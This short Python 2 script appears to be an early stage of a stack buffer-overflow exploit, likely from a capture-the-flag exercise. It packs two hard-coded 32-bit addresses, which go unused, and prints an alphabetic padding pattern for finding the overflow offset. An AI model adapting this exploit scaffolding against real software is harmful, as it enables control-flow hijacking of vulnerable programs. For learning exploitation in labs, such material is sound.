import struct

oAddr = struct.pack("I", 0x8048703)

nAddr = struct.pack("I", 0x8049960)

padding = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ"

print padding
